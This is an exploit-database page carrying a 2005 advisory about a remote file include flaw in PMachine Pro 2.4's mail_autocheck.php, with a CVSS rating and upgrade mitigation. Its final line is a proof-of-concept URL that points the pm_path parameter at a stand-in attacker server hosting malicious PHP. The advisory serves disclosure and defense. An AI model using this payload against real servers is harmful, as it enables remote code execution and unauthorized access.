header-logo
Suggest Exploit
vendor:
PMachine Pro
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PMachine Pro
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PMachine Pro Remote File Include Vulnerability

PMachine Pro is reported prone to a remote file include vulnerability. This issue affects the 'mail_autocheck.php' script. An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.

Mitigation:

Upgrade to the latest version of PMachine Pro
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12597/info

PMachine Pro is reported prone to a remote file include vulnerability.

This issue affects the 'mail_autocheck.php' script.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.

The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well. 

http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?

Navigation

Suggest Exploit

Services By CQR